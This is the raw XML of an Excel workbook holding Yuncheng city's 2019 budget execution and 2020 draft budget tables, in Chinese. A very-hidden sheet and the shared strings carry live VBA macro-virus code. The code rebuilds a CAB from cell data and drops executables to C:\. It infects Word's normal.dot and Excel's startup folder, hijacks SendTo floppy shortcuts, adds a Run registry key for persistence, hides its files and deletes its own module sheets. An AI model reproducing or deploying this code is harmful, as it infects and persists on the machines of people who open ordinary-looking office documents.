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tabRatio="908" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="00000000000000" sheetId="1" state="veryHidden" r:id="rId1"/>
    <sheet name="封皮" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet8" sheetId="3" r:id="rId3"/>
    <sheet name="目录" sheetId="4" r:id="rId4"/>
    <sheet name="封面（1）" sheetId="5" r:id="rId5"/>
    <sheet name="Sheet2" sheetId="6" r:id="rId6"/>
    <sheet name="1、2019全市收入完成表" sheetId="7" r:id="rId7"/>
    <sheet name="2、2019全市支出执行表" sheetId="8" r:id="rId8"/>
    <sheet name="3、2019市级收入完成表" sheetId="9" r:id="rId9"/>
    <sheet name="4、2019市级支出执行表" sheetId="10" r:id="rId10"/>
    <sheet name="5、2020全市收入预算" sheetId="11" r:id="rId11"/>
    <sheet name="6、2020全市支出预算" sheetId="12" r:id="rId12"/>
    <sheet name="7、2020年市本级一般收入预算" sheetId="13" r:id="rId13"/>
    <sheet name="8、2020年市本级一般支出预算" sheetId="14" r:id="rId14"/>
    <sheet name="9、2020年市本级一般支出经济科目" sheetId="15" r:id="rId15"/>
    <sheet name="10、2020年市本级一般基本支出经济科目" sheetId="16" r:id="rId16"/>
    <sheet name="11、2020年市本级基金收入预算" sheetId="17" r:id="rId17"/>
    <sheet name="12、2020年市本级基金支出预算" sheetId="18" r:id="rId18"/>
    <sheet name="13、2020年市本级国有资本经营预算" sheetId="19" r:id="rId19"/>
    <sheet name="封面（2）" sheetId="20" r:id="rId20"/>
    <sheet name="空白2" sheetId="21" r:id="rId21"/>
    <sheet name="14、2019年全市及市本级社保基金预算执行表" sheetId="22" r:id="rId22"/>
    <sheet name="15、2019年全市社保基金预算执行表" sheetId="23" r:id="rId23"/>
    <sheet name="16、2019市本级预算执行表" sheetId="24" r:id="rId24"/>
    <sheet name="17、2020年全市及市本级预算" sheetId="25" r:id="rId25"/>
    <sheet name="18、2020年全市预算表" sheetId="26" r:id="rId26"/>
    <sheet name="19、2020年市本级预算表" sheetId="27" r:id="rId27"/>
    <sheet name="封面3" sheetId="28" r:id="rId28"/>
    <sheet name="空白页4" sheetId="29" r:id="rId29"/>
    <sheet name="20、2018-2019年政府一般债务" sheetId="30" r:id="rId30"/>
    <sheet name="21、2018-2019年政府专项债务" sheetId="31" r:id="rId31"/>
    <sheet name="空白5" sheetId="32" r:id="rId32"/>
    <sheet name="报送条" sheetId="33" r:id="rId33"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Area" localSheetId="6">'1、2019全市收入完成表'!$A$1:$G$31</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="22">'15、2019年全市社保基金预算执行表'!$A$1:$I$19</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="23">'16、2019市本级预算执行表'!$A$1:$H$18</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="24">'17、2020年全市及市本级预算'!$A$1:$D$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="25">'18、2020年全市预算表'!$A$1:$H$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="26">'19、2020年市本级预算表'!$A$1:$G$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="8">'3、2019市级收入完成表'!$A$1:$G$23</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="9">'4、2019市级支出执行表'!$A$1:$G$28</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="10">'5、2020全市收入预算'!$A$1:$E$31</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="6">'1、2019全市收入完成表'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="15">'10、2020年市本级一般基本支出经济科目'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="17">'12、2020年市本级基金支出预算'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="7">'2、2019全市支出执行表'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="8">'3、2019市级收入完成表'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="9">'4、2019市级支出执行表'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="10">'5、2020全市收入预算'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="11">'6、2020全市支出预算'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="13">'8、2020年市本级一般支出预算'!$1:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">'目录'!$2:$2</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2325" uniqueCount="1726">
  <si>
    <t/>
  </si>
  <si>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</si>
  <si>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Private Sub createcabfile()</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile Application.StartupPath &amp; "\normal.xlm"</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Next</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</si>
  <si>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</si>
  <si>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</si>
  <si>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If Workbooks(i).name="norma1.xlm" then</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</si>
  <si>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</si>
  <si>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goto a1</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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cabfile= "c:\cab.cab"</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</si>
  <si>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</si>
  <si>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If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</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</si>
  <si>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</si>
  <si>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fso.delete cabfile</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</si>
  <si>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</si>
  <si>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open cabfile for binary access write as #1</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</si>
  <si>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</si>
  <si>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For i = 1 To 150</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</si>
  <si>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</si>
  <si>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r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>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</si>
  <si>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n=1</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</si>
  <si>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</si>
  <si>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m=instr(hv,"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</si>
  <si>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</si>
  <si>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do while m&gt;0</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</si>
  <si>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</si>
  <si>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ch=CByte(mid(hv,n,m-n))</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</si>
  <si>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</si>
  <si>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put #1,,ch</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</si>
  <si>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</si>
  <si>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n=m+1</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</si>
  <si>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</si>
  <si>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m=instr(n,hv,"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</si>
  <si>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</si>
  <si>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loop</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</si>
  <si>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</si>
  <si>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</si>
  <si>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close #1</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</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</si>
  <si>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</si>
  <si>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fso.deletefile cabfile</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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\normal.dot", myfolder, True</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</si>
  <si>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</si>
  <si>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set word=createobject("word.application")</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</si>
  <si>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</si>
  <si>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ntpath=word.NormalTemplate.Path &amp;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</si>
  <si>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</si>
  <si>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word.quit</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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\normal.dot", ntpath, True</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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp;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</si>
  <si>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</si>
  <si>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set fold=fso.getfolder(w.SpecialFolders("SendTo"))</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</si>
  <si>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</si>
  <si>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for each ff in fold.files</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</si>
  <si>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</si>
  <si>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r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>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</si>
  <si>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r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>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</si>
  <si>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r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>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</si>
  <si>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lnk.IconLocation="shell32.dll,6"</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</si>
  <si>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</si>
  <si>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lnk.save</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</si>
  <si>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</si>
  <si>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goto e2</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</si>
  <si>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</si>
  <si>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end if</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</si>
  <si>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</si>
  <si>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next</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</si>
  <si>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</si>
  <si>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e2:</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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\normal.dot"</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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\norma1.xlm"</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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\internet.exe"</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</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</si>
  <si>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</si>
  <si>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w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</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</si>
  <si>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</si>
  <si>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w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>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</si>
  <si>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thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</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</si>
  <si>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</si>
  <si>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workbooks("norma1.xlm").save</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</si>
  <si>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</si>
  <si>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r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>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</si>
  <si>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a1:</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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\excel.txt"</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</si>
  <si>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</si>
  <si>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Application.DisplayAlerts = False</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</si>
  <si>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</si>
  <si>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for i=1 to thisworkbook.sheets.count</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</si>
  <si>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</si>
  <si>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r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>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</si>
  <si>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ThisWorkbook.Sheets(i).Delete</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application.DisplayAlerts = True</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</si>
  <si>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</si>
  <si>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ThisWorkbook.Saved=True</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</si>
  <si>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</si>
  <si>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End Sub</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">运城市四届人大 </t>
  </si>
  <si>
    <t>六次会议文件（20）</t>
  </si>
  <si>
    <t>二○一九年全市和市本级预算执行情况及</t>
  </si>
  <si>
    <t>二○二○年全市和市本级预算（草案）</t>
  </si>
  <si>
    <t>运城市财政局</t>
  </si>
  <si>
    <t>目        录</t>
  </si>
  <si>
    <t>表一、运城市二○一九年财政收入完成情况表</t>
  </si>
  <si>
    <t>第1-2页</t>
  </si>
  <si>
    <t>表二、运城市二○一九年财政支出执行情况表</t>
  </si>
  <si>
    <t>第3-4页</t>
  </si>
  <si>
    <t>表三、运城市市本级二○一九年财政收入完成情况表</t>
  </si>
  <si>
    <t>第5-6页</t>
  </si>
  <si>
    <t>表四、运城市市本级二○一九年财政支出执行情况表</t>
  </si>
  <si>
    <t>第7-8页</t>
  </si>
  <si>
    <r>
      <t>表五、运城市二○二</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="黑体"/>
        <family val="0"/>
      </rPr>
      <t>○</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <rFont val="黑体"/>
        <family val="0"/>
      </rPr>
      <t>年财政收入预算（草案）</t>
    </r>
  </si>
  <si>
    <t>第9-10页</t>
  </si>
  <si>
    <t>表六、运城市二○二○年财政支出预算（草案）</t>
  </si>
  <si>
    <t>第11-12页</t>
  </si>
  <si>
    <t>表七、运城市市本级二○二○年一般公共预算收入（草案）</t>
  </si>
  <si>
    <t>第13页</t>
  </si>
  <si>
    <t>表八、运城市市本级二○二○年一般公共预算支出（草案）</t>
  </si>
  <si>
    <t>第14-43页</t>
  </si>
  <si>
    <t>表九、运城市市本级二○二○年一般公共预算支出分经济科目表（草案）</t>
  </si>
  <si>
    <t>第44页</t>
  </si>
  <si>
    <t>表十、运城市市本级二○二○年一般公共预算基本支出分经济科目表（草案）</t>
  </si>
  <si>
    <t>第45页</t>
  </si>
  <si>
    <t>表十一、运城市市本级二○二○年政府性基金预算收入（草案）</t>
  </si>
  <si>
    <t>第46页</t>
  </si>
  <si>
    <t>表十二、运城市市本级二○二○年政府性基金预算支出（草案）</t>
  </si>
  <si>
    <t>第47-49页</t>
  </si>
  <si>
    <t>表十三、运城市市本级二○二○年国有资本经营预算收支表（草案）</t>
  </si>
  <si>
    <t>第50页</t>
  </si>
  <si>
    <t>表十四、运城市及市本级二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>第51页</t>
  </si>
  <si>
    <t>表十五、运城市二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>第52页</t>
  </si>
  <si>
    <t>表十六、运城市市本级二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>第53页</t>
  </si>
  <si>
    <t>表十七、运城市及市本级二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t>第54页</t>
  </si>
  <si>
    <t>表十八、运城市二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t>第55页</t>
  </si>
  <si>
    <t>表十九、运城市市本级二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t>第56页</t>
  </si>
  <si>
    <t>表二十、运城市二○一八年和二○一九年政府一般债务限额和余额情况表</t>
  </si>
  <si>
    <t>第57页</t>
  </si>
  <si>
    <t>表二十一、运城市二○一八年和二○一九年政府专项债务限额和余额情况表</t>
  </si>
  <si>
    <t>第58页</t>
  </si>
  <si>
    <t>一般公共预算、政府性基金预算、</t>
  </si>
  <si>
    <t>国有资本经营预算</t>
  </si>
  <si>
    <t>运城市二○一九年财政收入完成情况表</t>
  </si>
  <si>
    <t>表一</t>
  </si>
  <si>
    <t xml:space="preserve">单位：万元 </t>
  </si>
  <si>
    <t>收  入  项  目</t>
  </si>
  <si>
    <t>2019年     预算数</t>
  </si>
  <si>
    <t>2019年  完成数</t>
  </si>
  <si>
    <t>完成为年度预算%</t>
  </si>
  <si>
    <t>完成为2018年决算%</t>
  </si>
  <si>
    <t>2018年决算数</t>
  </si>
  <si>
    <t>备      注</t>
  </si>
  <si>
    <t>一般公共预算收入合计</t>
  </si>
  <si>
    <t>税收收入</t>
  </si>
  <si>
    <t>一、增值税</t>
  </si>
  <si>
    <t>二、企业所得税</t>
  </si>
  <si>
    <t>三、企业所得税退税</t>
  </si>
  <si>
    <t>四、个人所得税</t>
  </si>
  <si>
    <t>五、资源税</t>
  </si>
  <si>
    <t>六、城市维护建设税</t>
  </si>
  <si>
    <t>七、房产税</t>
  </si>
  <si>
    <t>八、印花税</t>
  </si>
  <si>
    <t>九、城镇土地使用税</t>
  </si>
  <si>
    <t>十、土地增值税</t>
  </si>
  <si>
    <t>十一、车船税</t>
  </si>
  <si>
    <t>十二、耕地占用税</t>
  </si>
  <si>
    <t>十三、契税</t>
  </si>
  <si>
    <t>十四、烟叶税</t>
  </si>
  <si>
    <t>十五、环境保护税</t>
  </si>
  <si>
    <t>十六、其他税收收入</t>
  </si>
  <si>
    <t>非税收入</t>
  </si>
  <si>
    <t>十七、专项收入</t>
  </si>
  <si>
    <t>十八、行政事业性收费收入</t>
  </si>
  <si>
    <t>十九、罚没收入</t>
  </si>
  <si>
    <t>二十、国有资源（资产）有偿使用收入</t>
  </si>
  <si>
    <t>二十一、政府住房基金收入</t>
  </si>
  <si>
    <t>二十二、其他收入</t>
  </si>
  <si>
    <t>政府性基金预算收入合计</t>
  </si>
  <si>
    <t>其中:国有土地使用权出让收入</t>
  </si>
  <si>
    <t>土地招、拍、挂交易量增加。</t>
  </si>
  <si>
    <t>国有资本经营预算收入合计</t>
  </si>
  <si>
    <t>运城市二○一九年财政支出执行情况表</t>
  </si>
  <si>
    <t>表二</t>
  </si>
  <si>
    <t>支  出  项  目</t>
  </si>
  <si>
    <t>2019年变动
预算数</t>
  </si>
  <si>
    <t>2019年       执行数</t>
  </si>
  <si>
    <t>执行为      变动预算%</t>
  </si>
  <si>
    <t>执行为2018年决算%</t>
  </si>
  <si>
    <t>2018年执行数</t>
  </si>
  <si>
    <t>一般公共预算支出合计</t>
  </si>
  <si>
    <t>一、一般公共服务</t>
  </si>
  <si>
    <t>二、国防</t>
  </si>
  <si>
    <t>三、公共安全</t>
  </si>
  <si>
    <t>四、教育</t>
  </si>
  <si>
    <t>五、科学技术</t>
  </si>
  <si>
    <t>六、文化旅游体育与传媒</t>
  </si>
  <si>
    <t>七、社会保障和就业</t>
  </si>
  <si>
    <t>八、卫生健康支出</t>
  </si>
  <si>
    <t>九、节能环保</t>
  </si>
  <si>
    <t>十、城乡社区</t>
  </si>
  <si>
    <t>十一、农林水</t>
  </si>
  <si>
    <t>十二、交通运输</t>
  </si>
  <si>
    <t>十三、资源勘探信息等</t>
  </si>
  <si>
    <t>十四、商业服务业等</t>
  </si>
  <si>
    <t>十五、金融支出</t>
  </si>
  <si>
    <t>转移支付增加。</t>
  </si>
  <si>
    <t>十六、自然资源海洋气象等支出</t>
  </si>
  <si>
    <t>十七、住房保障支出</t>
  </si>
  <si>
    <t>十八、粮油物资储备支出</t>
  </si>
  <si>
    <t>十九、灾害防治及应急管理支出</t>
  </si>
  <si>
    <t>二十、债务付息支出</t>
  </si>
  <si>
    <t>政府债券利息增加。</t>
  </si>
  <si>
    <t>二十一、其他支出</t>
  </si>
  <si>
    <t>政府性基金预算支出合计</t>
  </si>
  <si>
    <t>其中： 国有土地使用权出让收入及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>国有资本经营预算支出合计</t>
  </si>
  <si>
    <t>运城市市本级二○一九年财政收入完成情况表</t>
  </si>
  <si>
    <t>表三</t>
  </si>
  <si>
    <t>2018年完成数</t>
  </si>
  <si>
    <t>三、个人所得税</t>
  </si>
  <si>
    <t>四、资源税</t>
  </si>
  <si>
    <t>五、城市维护建设税</t>
  </si>
  <si>
    <t>六、耕地占用税</t>
  </si>
  <si>
    <t>七、环境保护税</t>
  </si>
  <si>
    <t>八、其他税收收入</t>
  </si>
  <si>
    <t>九、专项收入</t>
  </si>
  <si>
    <t>十、行政事业性收费收入</t>
  </si>
  <si>
    <t>十一、罚没收入</t>
  </si>
  <si>
    <t>十二、国有资源（资产）有偿使用收入</t>
  </si>
  <si>
    <t>十三、政府住房基金收入</t>
  </si>
  <si>
    <t>十四、其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">   其中：国有土地使用权出让收入</t>
  </si>
  <si>
    <t>运城市市本级二○一九年财政支出执行情况表</t>
  </si>
  <si>
    <t>表四</t>
  </si>
  <si>
    <t>2019年变动预算数</t>
  </si>
  <si>
    <t>执行为2018 年决算%</t>
  </si>
  <si>
    <t>运城市二○二○年财政收入预算（草案）</t>
  </si>
  <si>
    <t>表五</t>
  </si>
  <si>
    <t>2019年完成数</t>
  </si>
  <si>
    <t>2020年预算数</t>
  </si>
  <si>
    <t>为2019年       完成数%</t>
  </si>
  <si>
    <t>备        注</t>
  </si>
  <si>
    <t>运城市二○二○年财政支出预算（草案）</t>
  </si>
  <si>
    <t>表六</t>
  </si>
  <si>
    <t>2019年
预算数</t>
  </si>
  <si>
    <t>其中：当年地方财力安排数</t>
  </si>
  <si>
    <t>2020年
预算数</t>
  </si>
  <si>
    <t>同口径为2019年预算数%</t>
  </si>
  <si>
    <t>一般公共预算当年安排支出合计</t>
  </si>
  <si>
    <t>其中：国有土地使用权出让收入及对应专项
      债务收入安排的支出</t>
  </si>
  <si>
    <t>运城市市本级二○二○年一般公共预算收入（草案）</t>
  </si>
  <si>
    <t>表七</t>
  </si>
  <si>
    <t xml:space="preserve">单位：万元  </t>
  </si>
  <si>
    <t>为2019年
完成数%</t>
  </si>
  <si>
    <t>运城市市本级二○二○年一般公共预算支出（草案）</t>
  </si>
  <si>
    <t>表八</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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统计调查工作任务量增加。</t>
  </si>
  <si>
    <t xml:space="preserve">      信息事务</t>
  </si>
  <si>
    <t xml:space="preserve">      专项统计业务</t>
  </si>
  <si>
    <t xml:space="preserve">      统计管理</t>
  </si>
  <si>
    <t xml:space="preserve">      专项普查活动</t>
  </si>
  <si>
    <t>开展第七次全国人口普查。</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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发票管理及税务登记</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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国家赔偿费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他一般公共服务支出</t>
  </si>
  <si>
    <t>二、外交支出</t>
  </si>
  <si>
    <t xml:space="preserve">    对外合作与交流</t>
  </si>
  <si>
    <t xml:space="preserve">      对外合作活动</t>
  </si>
  <si>
    <t xml:space="preserve">    其他外交支出</t>
  </si>
  <si>
    <t>三、国防支出</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>四、公共安全支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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检查监督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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他公共安全支出</t>
  </si>
  <si>
    <t>五、教育支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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六、科学技术支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他技术研究与开发支出</t>
  </si>
  <si>
    <t>科技创新专项资金增加。</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">      科技奖励</t>
  </si>
  <si>
    <t xml:space="preserve">      核应急</t>
  </si>
  <si>
    <t xml:space="preserve">      转制科研机构</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术支出</t>
  </si>
  <si>
    <t>七、文化旅游体育与传媒支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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印报设备购置。</t>
  </si>
  <si>
    <t xml:space="preserve">      版权管理</t>
  </si>
  <si>
    <t xml:space="preserve">      电影</t>
  </si>
  <si>
    <t xml:space="preserve">      其他新闻出版电影支出</t>
  </si>
  <si>
